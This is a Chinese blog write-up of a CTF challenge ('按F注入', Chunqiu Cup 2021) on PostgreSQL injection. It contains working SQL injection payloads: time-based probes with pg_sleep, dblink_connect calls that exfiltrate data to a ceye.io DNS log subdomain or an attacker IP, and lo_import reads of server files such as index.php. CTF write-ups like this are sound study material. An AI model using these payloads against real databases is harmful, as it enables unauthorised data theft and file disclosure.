<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#000000"><meta name="author" content="gyy"><meta name="copyright" content="gyy"><meta name="generator" content="Hexo 5.2.0"><meta name="theme" content="hexo-theme-yun"><title>春秋杯2021新春欢乐赛一道题——按F注入 对pgsql的研究 | Err0r</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/star-markdown-css@0.1.22/dist/yun/yun-markdown.min.css"><script src="//at.alicdn.com/t/font_1140697_ed8vp4atwoj.js" async></script><script src="https://cdn.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>document.addEventListener("DOMContentLoaded", () => <!-- hexo-inject:begin --><!-- hexo-inject:end -->{
  [".post-card",".post-content img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
});
</script><link id="light-prism-css" rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@latest/themes/prism.css" media="(prefers-color-scheme: light)"><link id="dark-prism-css" rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@latest/themes/prism-tomorrow.css" media="(prefers-color-scheme: dark)"><link rel="icon" href="/favicon.ico"><link rel="mask-icon" href="/favicon.ico" color="#000000"><link rel="alternate icon" href="/yun.ico"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="preload" href="/js/utils.js" as="script"><link rel="preload" href="/js/hexo-theme-yun.js" as="script"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><script id="yun-config">
    const Yun = window.Yun || {};
    window.CONFIG = {"hostname":"err0r.top","root":"/","title":"浅伴独蓝的小站","version":"1.6.1","mode":"time","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"想要搜些什么？","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）"},"anonymous_image":"https://cdn.jsdelivr.net/gh/YunYouJun/cdn/img/avatar/none.jpg","say":{"api":"https://v1.hitokoto.cn","hitokoto":true},"local_search":{"path":"/search.xml"}};
  </script><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script src="/js/utils.js"></script><script src="/js/hexo-theme-yun.js"></script><link rel="alternate" href="/atom.xml" title="Err0r" type="application/atom+xml"><script>(function(){
  var bp = document.createElement('script');
  var curProtocol = window.location.protocol.split(':')[0];
  if (curProtocol === 'https') {
    bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
  }
  else {
    bp.src = 'http://push.zhanzhang.baidu.com/push.js';
  }
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(bp, s);
})();</script><meta name="description" content="只做了一道题，按F注入，研究了pgsql，算个小笔记，不能算研究性文章">
<meta property="og:type" content="article">
<meta property="og:title" content="春秋杯2021新春欢乐赛一道题——按F注入 对pgsql的研究">
<meta property="og:url" content="https://err0r.top/article/cqb2021/index.html">
<meta property="og:site_name" content="Err0r">
<meta property="og:description" content="只做了一道题，按F注入，研究了pgsql，算个小笔记，不能算研究性文章">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://err0r.top/article/cqb2021/image-20210201185004667.png">
<meta property="og:image" content="https://err0r.top/article/cqb2021/image-20210201185510275.png">
<meta property="og:image" content="https://err0r.top/article/cqb2021/image-20210201195343606.png">
<meta property="og:image" content="https://err0r.top/article/cqb2021/image-20210201200309775.png">
<meta property="og:image" content="https://err0r.top/article/cqb2021/image-20210201215153531.png">
<meta property="og:image" content="https://err0r.top/article/cqb2021/image-20210201220913327.png">
<meta property="og:image" content="https://err0r.top/article/cqb2021/image-20210202011754628.png">
<meta property="og:image" content="https://err0r.top/article/cqb2021/image-20210202004121305.png">
<meta property="og:image" content="https://err0r.top/article/cqb2021/image-20210201200655345.png">
<meta property="og:image" content="https://err0r.top/article/cqb2021/image-20210201201204964.png">
<meta property="og:image" content="https://err0r.top/article/cqb2021/image-20210202021430433.png">
<meta property="article:published_time" content="2021-02-01T10:45:42.000Z">
<meta property="article:modified_time" content="2021-03-30T11:49:26.770Z">
<meta property="article:author" content="gyy">
<meta property="article:tag" content="SQL">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://err0r.top/article/cqb2021/image-20210201185004667.png"><script src="/js/ui/mode.js"></script><!-- hexo-inject:begin --><!-- hexo-inject:end --></head><body><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-list-ordered"></use></svg></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-passport-line"></use></svg></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="gyy"><img width="96" loading="lazy" src="/images/avatar.jpg" alt="gyy"></a><div class="site-author-name"><a href="/about/">gyy</a></div><a class="site-name" href="/about/site.html">Err0r</a><sub class="site-subtitle">gyy</sub><div class="site-desciption">gugugu</div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-home-4-line"></use></svg></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-archive-line"></use></svg></span><span class="site-state-item-count">32</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-2-line"></use></svg></span><span class="site-state-item-count">5</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="site-state-item-count">10</span></a></div><a class="site-state-item hty-icon-button" target="_blank" rel="noopener" href="https://yun.yunyoujun.cn" title="文档"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-settings-line"></use></svg></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" title="QQ MTkwNjk2ODc2NA==" target="_blank" style="color:#12B7F5"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-qq-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://github.com/Err0rCM" title="GitHub" target="_blank" style="color:#6e5494"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-github-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://space.bilibili.com/8408670" title="哔哩哔哩" target="_blank" style="color:#FF8EB3"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-bilibili-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="mailto:err0rcm@qq.com" title="E-Mail" target="_blank" style="color:#8E71C1"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-mail-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="/atom.xml" title="RSS" target="_blank" style="color:orange"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-rss-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://travellings.now.sh/" title="Travelling" target="_blank" style="color:var(--hty-text-color)"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-send-plane-2-line"></use></svg></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们|友情链接" style="color:dodgerblue"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-open-arm-line"></use></svg></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-contrast-2-line"></use></svg></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8C%89F%E6%B3%A8%E5%85%A5"><span class="toc-number">1.</span> <span class="toc-text">按F注入</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80%EF%BC%9A%E5%BB%B6%E6%97%B6%E6%B3%A8%E5%85%A5"><span class="toc-number">1.1.</span> <span class="toc-text">方法一：延时注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E5%BC%8F%E4%BA%8C%EF%BC%9A%E4%BF%A1%E6%81%AF%E5%B8%A6%E5%A4%96"><span class="toc-number">1.2.</span> <span class="toc-text">方式二：信息带外</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E5%BC%8F%E4%B8%89%EF%BC%9A%E6%95%B0%E6%8D%AE%E5%BA%93%E5%A4%96%E8%81%94"><span class="toc-number">1.3.</span> <span class="toc-text">方式三：数据库外联</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C"><span class="toc-number">1.3.1.</span> <span class="toc-text">实验</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B3%A8%E5%85%A5%E7%82%B9"><span class="toc-number">1.4.</span> <span class="toc-text">注入点</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#DNSlog"><span class="toc-number">1.4.1.</span> <span class="toc-text">DNSlog</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%95%B0%E6%8D%AE%E5%BA%93%E5%A4%96%E8%81%94"><span class="toc-number">1.4.2.</span> <span class="toc-text">数据库外联</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%84%9F%E8%B0%A2"><span class="toc-number">2.</span> <span class="toc-text">感谢</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5"><span class="toc-number">3.</span> <span class="toc-text">参考链接</span></a></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article"><link itemprop="mainEntityOfPage" href="https://err0r.top/article/cqb2021/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="gyy"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="Err0r"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">春秋杯2021新春欢乐赛一道题——按F注入 对pgsql的研究</h1><div class="post-meta"><div class="post-time" style="display:block"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-calendar-line"></use></svg></span> <time title="创建时间：2021-02-01 18:45:42" itemprop="dateCreated datePublished" datetime="2021-02-01T18:45:42+08:00">2021-02-01</time><span class="post-meta-divider">-</span><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-calendar-2-line"></use></svg></span> <time title="修改时间：2021-03-30 19:49:26" itemprop="dateModified" datetime="2021-03-30T19:49:26+08:00">2021-03-30</time></div><span class="post-count"><span class="post-symbolcount"><span class="post-meta-item-icon" title="本文字数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-file-word-line"></use></svg></span> <span title="本文字数">3.4k</span><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读时长"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-timer-line"></use></svg></span> <span title="阅读时长">15m</span></span></span><span class="post-busuanzi"><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读次数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg> <span id="busuanzi_value_page_pv"></span></span></span><span class="post-meta-divider">-</span><a href="#comment"><span class="post-meta-item-icon" title="评论数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-chat-3-line"></use></svg> <span class="waline-comment-count" id="/article/cqb2021/"></span></span></a><div class="post-classify"><span class="post-category"> <span class="post-meta-item-icon" style="margin-right:3px;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-line"></use></svg></span><span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category-item" href="/categories/Write-Up/" style="--text-color:var(--hty-text-color)" itemprop="url" rel="index"><span itemprop="text">Write-Up</span></a></span></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body" style="--smc-primary:#000000;"><p>只做了一道题，按F注入，研究了pgsql，算个小笔记，不能算研究性文章</p>
<!-- hexo-inject:begin --><!-- hexo-inject:end --><a id="more"></a>

<h2 id="按F注入"><a href="#按F注入" class="headerlink" title="按F注入"></a>按F注入</h2><p>打开题目看到只能手机访问，看到了源码</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token operator">&lt;</span>body<span class="token operator">></span>只有手机才能访问<span class="token operator">&lt;</span><span class="token operator">!</span><span class="token operator">--</span><span class="token keyword">function</span> <span class="token function">is_mobile</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span><span class="token operator">--</span><span class="token operator">></span>
<span class="token operator">&lt;</span><span class="token operator">!</span><span class="token operator">--</span><span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token keyword">isset</span> <span class="token punctuation">(</span><span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'HTTP_USER_AGENT'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span><span class="token operator">--</span><span class="token operator">></span>
<span class="token operator">&lt;</span><span class="token operator">!</span><span class="token operator">--</span><span class="token variable">$clientkeywords</span> <span class="token operator">=</span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token operator">--</span><span class="token operator">></span>
<span class="token operator">&lt;</span><span class="token operator">!</span><span class="token operator">--</span><span class="token single-quoted-string string">'nokia'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'sony'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'ericsson'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'mot'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'samsung'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'htc'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'sgh'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'lg'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'sharp'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'sie-'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'philips'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'panasonic'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'alcatel'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'lenovo'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'iphone'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'ipod'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'blackberry'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'meizu'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'android'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'netfront'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'symbian'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'ucweb'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'windowsce'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'palm'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'operamini'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'operamobi'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'openwave'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'nexusone'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'cldc'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'midp'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'wap'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'mobile'</span><span class="token operator">--</span><span class="token operator">></span>
<span class="token operator">&lt;</span><span class="token operator">!</span><span class="token operator">--</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token operator">--</span><span class="token operator">></span>
<span class="token operator">&lt;</span><span class="token operator">!</span><span class="token operator">--</span><span class="token comment">//从HTTP_USER_AGENT中查找手机浏览器的关键字--></span>
<span class="token operator">&lt;</span><span class="token operator">!</span><span class="token operator">--</span><span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token double-quoted-string string">"/("</span> <span class="token punctuation">.</span> <span class="token function">implode</span><span class="token punctuation">(</span><span class="token single-quoted-string string">'|'</span><span class="token punctuation">,</span> <span class="token variable">$clientkeywords</span><span class="token punctuation">)</span> <span class="token punctuation">.</span> <span class="token double-quoted-string string">")/i"</span><span class="token punctuation">,</span> <span class="token function">strtolower</span><span class="token punctuation">(</span><span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'HTTP_USER_AGENT'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span><span class="token operator">--</span><span class="token operator">></span>
<span class="token operator">&lt;</span><span class="token operator">!</span><span class="token operator">--</span><span class="token keyword">return</span> <span class="token boolean constant">true</span><span class="token punctuation">;</span><span class="token operator">--</span><span class="token operator">></span>
<span class="token operator">&lt;</span><span class="token operator">!</span><span class="token operator">--</span><span class="token punctuation">&#125;</span><span class="token operator">--</span><span class="token operator">></span>
<span class="token operator">&lt;</span><span class="token operator">!</span><span class="token operator">--</span><span class="token punctuation">&#125;</span><span class="token operator">--</span><span class="token operator">></span>
<span class="token operator">&lt;</span><span class="token operator">!</span><span class="token operator">--</span><span class="token keyword">return</span> <span class="token boolean constant">false</span><span class="token punctuation">;</span><span class="token operator">--</span><span class="token operator">></span>
<span class="token operator">&lt;</span><span class="token operator">!</span><span class="token operator">--</span><span class="token punctuation">&#125;</span><span class="token operator">--</span><span class="token operator">></span><span class="token operator">&lt;</span><span class="token operator">/</span>body<span class="token operator">></span></code></pre>

<p>于是在HEADER里添加<code>User-Agent: mobile</code>即可</p>
<img src="/article/cqb2021/image-20210201185004667.png" class="" title="UA" loading="lazy">

<p>点击任何都是JavaScript脚本<code>javascript:alert(&#39;投票成功,恭喜您获得奶奶一个&#39;)</code>，底部发现了提示</p>
<p><code>&lt;!--&lt;a href=&quot;?f=1&quot;&gt;我选择按下F进入TK&lt;/a&gt;--&gt;</code></p>
<p>于是访问<code>./?f=1</code>没有变化，猜测SSRF或SQL注入，但是没有其他提示。</p>
<p>访问<code>./?f=1&#39;</code>发现有弹窗</p>
<img src="/article/cqb2021/image-20210201185510275.png" class="" title="小哥哥" loading="lazy">

<p>fuzz一波，发现<code>#</code>和<code>%23</code>都会一直弹窗，而使用<code>--</code>注释即<code>?f=1&#39; --</code>却不会弹窗，搜索一波发现是 PostgreSQL ，猜测<strong>语法错误</strong>或者<strong>报错</strong>会有弹窗</p>
<p>甚至搜到了原题，赛后向 <a target="_blank" rel="noopener" href="https://ha1c9on.top/">@HA1C9ON</a> 大佬请教得知，当时比赛的WP是有错误的，后续会道来。</p>
<p>测试一下发现<code>./?f=</code></p>
<blockquote>
<ul>
<li><code>gyy</code>，没有警告</li>
<li><code>gyy&#39;</code>，警告</li>
<li><code>gyy&#39; and 1=0 --</code>，没有警告</li>
<li><code>gyy&#39; and 1=1 --</code>，没有警告</li>
<li><code>gyy&#39; order by 1 --</code>，没有警告</li>
<li><code>gyy&#39; order by 2 --</code>，没有警告</li>
<li><code>gyy&#39; order by 3 --</code>， 警告</li>
<li><code>gyy&#39; union select 1,2 --</code>， 警告</li>
<li><code>gyy&#39; union select 1,&#39;2&#39; --</code>，没有警告</li>
<li><code>gyy&#39; union select 1,pg_sleep(10) --</code>， 警告</li>
<li><code>gyy&#39; union select 1,cast(pg_sleep(10) as text) --</code>，没有警告（有延迟！）</li>
<li><code>gyy&#39; union select 1,&#39;2&#39; from pg_database --</code>，没有警告</li>
<li><code>gyy&#39; union select 1,&#39;2&#39; from gyy --</code>， 警告</li>
<li><code>gyy&#39; union select 1,chr(65) --</code>，没有警告</li>
<li><code>gyy&#39; union select 1,chr(-65) --</code>，没有警告</li>
</ul>
</blockquote>
<p>由order by可以判断此处列数为2，由union select可以判断1处对应列为数值类型，2处对应非数值类型</p>
<h3 id="方法一：延时注入"><a href="#方法一：延时注入" class="headerlink" title="方法一：延时注入"></a>方法一：延时注入</h3><p> postgrest数据库中的延时函数有<code>pg_sleep()</code>/<code>pg_sleep_for()</code>/<code>pg_sleep_until()</code></p>
<p>查阅资料得知：</p>
<blockquote>
<p>pg_sleep(seconds)<br>pg_sleep_for(interval)<br>pg_sleep_until(timestamp with time zone)</p>
<p>pg_sleep让当前的会话进程休眠seconds 秒以后再执行。seconds是一个double precision 类型的值，所以可以指定带小数的秒数。<br>pg_sleep_for 对于指定为interval的较长睡眠时间是一个便利函数。<br>pg_sleep_until在需要特定唤醒时间时比较便利。</p>
<p>SELECT pg_sleep(1.5);<br>SELECT pg_sleep_for(‘5 minutes’);<br>SELECT pg_sleep_until(‘tomorrow 03:00’);</p>
</blockquote>
<p>当时比赛脚本参考 <a target="_blank" rel="noopener" href="https://github.com/w181496/CTF/blob/master/fbctf2019/hr_admin_module/exp.py">balsn</a></p>
<p>这里不做阐述，因为最终得出结果</p>
<pre class="language-none"><code class="language-none">version: (Debian 11.2-1.pgdg90+1)
current_db: docker_db
current_schema: public
table of public: searches
columns of searches: id,search
counts of searches:0</code></pre>

<p><code>searches</code>表为空，所以本题应读取文件</p>
<h3 id="方式二：信息带外"><a href="#方式二：信息带外" class="headerlink" title="方式二：信息带外"></a>方式二：信息带外</h3><p>利用DNSlog方式</p>
<p>在PostgreSQL中，存在dblink模块，可以外联数据库或者当前数据库，dblink_connect同时会对host进行DNS查询，利用查询给定DNS的子域名，再查DNS解析记录即可获取传递的信息，这里用<a target="_blank" rel="noopener" href="http://ceye.io/">ceye</a>来记录</p>
<p>首先看看dblink模块有没有开启</p>
<pre class="language-none"><code class="language-none">.&#x2F;?f&#x3D;1&#39; union select 1,(select dblink_connect(&#39;&#39;)) --</code></pre>

<p>没有报错，说明可以操作继续尝试</p>
<pre class="language-none"><code class="language-none">.&#x2F;?f&#x3D;1&#39; union select 1,(select dblink_connect(&#39;host&#x3D;&#39; || (SELECT current_database()) || &#39;.xxxx.ceye.io user&#x3D;a password&#x3D;a dbname&#x3D;a&#39;)) --</code></pre>

<p>xxxx是ceye个人的 Identifier ，可见成功返回了当前数据库名</p>
<img src="/article/cqb2021/image-20210201195343606.png" class="" title="ceye" loading="lazy">

<p>原理是通过<code>.</code>连接，让pgsql去解析host即给定DNS的子域名，从而带出信息。顺着这个方法可以带出来部分信息</p>
<p>接着就要考虑如何文件包含了，在这里原WP写的很清楚</p>
<blockquote>
<p>我们可能确实需要从中窃取数据<code>/var/lib/postgresql/data/secret</code>。不幸的是，如果我们尝试使用<code>pg_read_file</code>或<code>pg_read_binary_file</code>读取文件，则不会获得传入连接，因此当前用户可能无权使用这些功能。</p>
<p>读取文件的替代方法是使用<a target="_blank" rel="noopener" href="https://www.postgresql.org/docs/11/lo-funcs.html">大对象</a>。我们可以用来<code>lo_import</code>将文件的内容加载到<code>pg_largeobject</code>目录中。如果查询成功，我们将获得对象的<code>oid</code>。</p>
</blockquote>
<p> 当前用户为docker，不够权限执行系统管理员才能执行的函数<code>pg_read_file()</code>, <code>pg_ls_dir()</code> or <code>pg_stat_file()</code> ，也不方便写udf，没有写权限。</p>
<p>下面截取原WP的部分内容：</p>
<blockquote>
<p>碰到这种情况也就是需要绕过的时候的做法，一般都是谷歌百度，然后阅读文档，另外可以自己起一个环境去搜索相关的函数。例如在这里，balsn的做法是另外起一个环境：</p>
<pre class="language-text" data-language="text"><code class="language-text">SELECT proname FROM pg_proc WHERE proname like &#39;%file%&#39;;   查询所有带有file的函数
pg_stat_get_db_temp_files
 pg_walfile_name_offset
 pg_walfile_name
 pg_rotate_logfile_old
 pg_read_file_old
 pg_read_file
 pg_read_file
 pg_read_file
 pg_read_binary_file
 pg_read_binary_file
 pg_read_binary_file
 pg_stat_file
 pg_stat_file
 pg_relation_filenode
 pg_filenode_relation
 pg_relation_filepath
 pg_show_all_file_settings
 pg_hba_file_rules
 pg_rotate_logfile
 pg_current_logfile
 pg_current_logfile</code></pre>

<p>但是这些函数都似乎没起作用</p>
<pre class="language-text" data-language="text"><code class="language-text">SELECT proname FROM pg_proc WHERE proname like &#39;%read%&#39;;   查阅带有read的函数
loread
 pg_stat_get_db_blk_read_time
 pg_read_file_old
 pg_read_file
 pg_read_binary_file</code></pre>

<p>可以看到第一个方法，通过查阅文档（学会阅读文档很重要！）</p>
<p>loread是面向SQL的大对象函数，比如<code>lo_from_bytea</code>，<code>lo_put</code>，<code>lo_get</code>，<code>lo_creat</code>, <code>lo_create</code>,</p>
<pre class="language-none"><code class="language-none">lo_unlink&#96;， &#96;lo_import&#96;和 &#96;lo_export</code></pre>

<p> 服务器端的<code>lo_import</code>和 <code>lo_export</code>函数和客户端的那几个有着显著的不同。 这两个函数在服务器的文件系统里读写文件， 使用数据库所有者的权限进行。 因此，只有超级用户才能使用他们。相比之下，客户端的输入和输出函数在客户端的文件系统里读写文件， 使用客户端程序的权限。客户端函数不需要超级用户权限。<br><code>lo_read</code>和<code>lo_write</code>的功能通过服务器端调用可用， 但是服务器端函数名不同于客户端接口，因为他们不包含下划线。你必须作为<code>loread</code>和<code>lowrite</code> 调用这些函数。 </p>
<p>在将服务器端lo_import和lo_export函数授权给非超级用户时需要仔细考虑安全隐患。 具有此类权限的恶意用户可以轻松地将其变为超级用户（例如，通过重写服务器配置文件），或者可以攻击服务器的其余文件系统，而无需获取数据库超级用户权限。 因此，对这两个函数的权限授予必须谨慎。</p>
</blockquote>
<p>回到题目中来，lo_import方法可以读取文件为postgres对象，原准备利用lo_export写文件，可是应该是没有权限</p>
<p>我们先包含<code>index.php</code>看看源码</p>
<pre class="language-none"><code class="language-none">.&#x2F;?f&#x3D;gyy&#39; union select (select lo_import(&#39;&#x2F;var&#x2F;www&#x2F;html&#x2F;index.php&#39;)),&#39;2&#39; --</code></pre>

<p><strong>请注意！请注意！请注意！</strong>错误写法：</p>
<p><code>./?f=gyy&#39; union select 1,(select dblink_connect(&#39;host=&#39; || (select lo_import(&#39;/var/www/html/index.php&#39;)) || &#39;.xxxx.ceye.io user=a password=a dbname=a&#39;)) --</code></p>
<p>表面上确实返回了oid</p>
<img src="/article/cqb2021/image-20210201200309775.png" class="" title="DNSlogoid" loading="lazy">

<p>但是，在 dblink下 lo_import只是在vps上的 生效，并没有实际包含，在方式三会有实验证明，在最后有对注入点的解释。</p>
<p>然后接下来发现，这里利用DNSlog进行信息外带还有的问题是要遵循DNS协议，最大位数不超过63位，且不能有任何特殊符号及空格回车之类的，只能用<code>substring</code>函数一段一段截取，还得<code>replace</code>替换字符，可以完成但非常麻烦，不推荐使用。</p>
<h3 id="方式三：数据库外联"><a href="#方式三：数据库外联" class="headerlink" title="方式三：数据库外联"></a>方式三：数据库外联</h3><p>为了更好理解，下面先进行实验测试，dblink下 lo_import只是在vps上的 生效，并没有实际包含，详情可见如下</p>
<hr>
<h4 id="实验"><a href="#实验" class="headerlink" title="实验"></a>实验</h4><p>服务器或本地起一个pgsql服务，可以安装，也可以docker起一个记得开端口映射，然后将其中的<code>postgresql.conf</code>中设置<code>listen_addresses = &#39;*&#39;</code>以监听。然后运行tcpdump监听端口流量</p>
<pre class="language-none"><code class="language-none">sudo tcpdump -nX -i eth0 port 5432</code></pre>

<p>默认端口为5432</p>
<p>dblink下包含文件</p>
<pre class="language-none"><code class="language-none">?f&#x3D;gyy&#39; union select 1,(SELECT dblink_connect(&#39;host&#x3D;IP user&#x3D;postgres password&#x3D;postgres dbname&#x3D;@&#39;|| (select lo_import(&#39;&#x2F;var&#x2F;www&#x2F;html&#x2F;index.php&#39;)) )) --</code></pre>

<img src="/article/cqb2021/image-20210201215153531.png" class="" title="oid" loading="lazy">

<p>返回oid16438，我们读取一下所有oid列表看一下</p>
<pre class="language-none"><code class="language-none">?f&#x3D;gyy&#39; union select 1,(SELECT dblink_connect(&#39;host&#x3D;IP user&#x3D;@&#39; || (SELECT string_agg(cast(oid as text), &#39;,&#39;) FROM pg_largeobject_metadata) || &#39; password&#x3D;postgres dbname&#x3D;postgres&#39;)) --</code></pre>

<p>没有报错，同时，<strong>没有任何数据返回</strong></p>
<p>而我们直接包含<code>index.php</code>试一下</p>
<pre class="language-none"><code class="language-none">?f&#x3D;gyy&#39; union select (select lo_import(&#39;&#x2F;var&#x2F;www&#x2F;html&#x2F;index.php&#39;)),&#39;2&#39; --</code></pre>

<p>没有报错，再查一下oid列表</p>
<img src="/article/cqb2021/image-20210201220913327.png" class="" title="oid2" loading="lazy">

<p>有数据返回，同时可见16439和16440，而16438并没有在列表中，读取16438数据没有返回，读取16439与16440正常返回</p>
<p>可见dblink下lo_import在本地是不生效的</p>
<hr>
